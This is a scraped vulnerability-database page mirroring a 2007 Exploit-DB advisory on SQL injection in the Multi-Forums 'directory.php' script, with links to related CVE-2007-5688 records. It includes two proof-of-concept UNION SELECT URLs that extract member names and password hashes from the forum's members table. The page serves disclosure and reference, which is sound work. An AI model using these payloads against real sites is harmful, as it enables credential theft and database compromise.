Lucene search
KiNgOfThEwOrLdEDB-ID:30712HistoryOct 25, 2007 - 12:00 a.m.
Multi-Forums - 'Directory.php' Multiple SQL Injections
2007-10-2500:00:00
KiNgOfThEwOrLd
www.exploit-db.com
15
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/26213/info
Multi-Forums is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
http://www.example.com/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id] Related
cvelist
cvelist
CVE-2007-5688
2007-10-29 19:00:00
nvd
nvd
CVE-2007-5688
2007-10-29 19:46:00
prion
prion
Sql injection
2007-10-29 19:46:00
cve
cve
CVE-2007-5688
2007-10-29 19:46:00